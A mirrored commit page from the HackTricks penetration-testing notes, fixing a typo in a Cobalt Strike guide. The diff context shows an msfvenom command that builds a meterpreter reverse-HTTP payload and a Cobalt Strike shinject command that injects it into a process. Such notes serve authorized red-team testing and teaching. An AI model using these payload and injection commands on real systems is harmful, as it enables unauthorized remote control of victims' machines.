mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-14 00:47:24 +00:00
Update cobalt-strike.md
This commit is contained in:
parent
f944a3c8d3
commit
9aa6809ae2
1 changed files with 1 additions and 1 deletions
|
@ -160,7 +160,7 @@ beacon> spawn metasploit
|
|||
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
|
||||
## Run msfvenom and prepare the multi/handler listener
|
||||
|
||||
## Copy bin file to coblat strike host
|
||||
## Copy bin file to cobalt strike host
|
||||
ps
|
||||
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
|
||||
|
||||
|
|
Loading…
Reference in a new issue